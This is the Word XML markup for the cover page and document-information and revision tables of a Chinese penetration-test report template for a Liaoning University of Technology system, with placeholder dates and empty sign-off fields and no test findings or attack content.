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0FC63">
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:wordWrap/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE1588C">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:ind w:left="105" w:right="105"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EAECE6D">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:ind w:left="105" w:right="105"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12841626">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:ind w:left="105" w:right="105"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D731C69">
      <w:pPr>
        <w:pStyle w:val="46"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>辽宁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工业大学</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗透测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F180388">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>——xxxx系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ABA3DB">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1121F8F3">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>（周期测试）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CC0E93">
      <w:pPr>
        <w:pStyle w:val="45"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C4F182C">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:ind w:left="0" w:leftChars="0" w:right="105"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1631315</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>185420</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2308860" cy="3297555"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:wrapNone/>
            <wp:docPr id="3" name="图片 3" descr="资源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资源 1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="496"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2308860" cy="3297555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:effectLst>
                      <a:outerShdw blurRad="50800" dist="50800" dir="5400000" sx="1000" sy="1000" algn="ctr" rotWithShape="0">
                        <a:srgbClr val="000000">
                          <a:alpha val="100000"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AE8C23">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:ind w:left="105" w:right="105"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3885A804">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:ind w:left="105" w:right="105"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51DFDBB8">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:ind w:left="105" w:right="105"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A6229F">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:ind w:left="105" w:right="105"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560EBAB5">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:ind w:left="105" w:right="105"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21550B03">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:ind w:left="105" w:right="105"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C6E870">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D1301E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A55853">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="375C9F1A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C8CF0A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0468EEA9">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A9F9C1E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FFB2FB6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="224FFC1A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>大学生探索网网络安全团队</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B2BBD0">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53525AC6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc129250112"/>
    </w:p>
    <w:p w14:paraId="01B5BB71">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>文档信息</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4125"/>
        <w:gridCol w:w="1478"/>
        <w:gridCol w:w="1627"/>
      </w:tblGrid>
      <w:tr w14:paraId="33E4D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exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2681A902">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>项目名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7043" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79593046">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>辽宁</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>工业大学</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>xx月渗透测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="14CF6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exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63DCF41F">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文档名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7043" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0565AE22">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>辽宁</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>工业大学</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>_xxxx系统_</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>渗透测试报告</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2A907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exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EB6E793">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文档编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7043" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59826041">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="32579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exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59948984">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>文件类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7043" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05FE0DF6">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>项目文档</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>_周期测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4D89B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exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29B56494">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>创</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>建</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>人</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4018" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79F64D9E">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1434E0D4">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D790DD7">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="29BF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exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F956F45">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>审 核</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>人</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4018" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4787FFCA">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BCFB4EB">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>审核日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66DCCE8E">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="694AF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exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03848194">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>批 准 人</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4018" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77D0DB07">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E72132F">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>批准日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37A8B262">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4844F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exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51C72705">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>收</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>方</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4018" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="092BFC08">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>辽宁工业大学</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>智慧校园建设中心</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40541ED4">
            <w:pPr>
              <w:pStyle w:val="47"/>
              <w:wordWrap/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>接收日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AF71AFE">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7649E943">
      <w:pPr>
        <w:pStyle w:val="74"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108FF0AD">
      <w:pPr>
        <w:pStyle w:val="74"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>修订记录</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="20"/>
        <w:tblW w:w="5027"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9"/>
        <w:gridCol w:w="756"/>
        <w:gridCol w:w="2543"/>
        <w:gridCol w:w="1383"/>
        <w:gridCol w:w="1310"/>
        <w:gridCol w:w="1916"/>
        <w:gridCol w:w="11"/>
      </w:tblGrid>
      <w:tr w14:paraId="187F5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9" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
          </w:tcPr>
          <w:p w14:paraId="6AF7D97A">
            <w:pPr>
